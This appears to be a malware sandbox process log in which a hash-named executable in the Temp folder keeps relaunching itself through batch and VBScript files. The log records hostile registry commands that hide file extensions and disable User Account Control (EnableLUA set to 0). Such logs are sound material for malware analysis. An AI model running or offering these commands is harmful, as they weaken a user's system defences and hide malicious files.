cmd /c ""C:\Users\Admin\AppData\Local\Temp\PqAUsAEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NgUgkwcM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\JyQEwwkA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TcEcIEoY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wQMQQYkk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YuMsMgMQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MYMwYEcQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\juIUQgEw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xIwwQgMg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HIQsgsMg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FykIEQkw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QowokgUE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QsQwcQsU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SKAQksMo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tgQQcYYg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VesEMskc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lGwccAMk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TEksMsMw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wGQoUcAE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mQswgMsA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sWgcIIog.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SMUcMogM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lIIEkAME.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
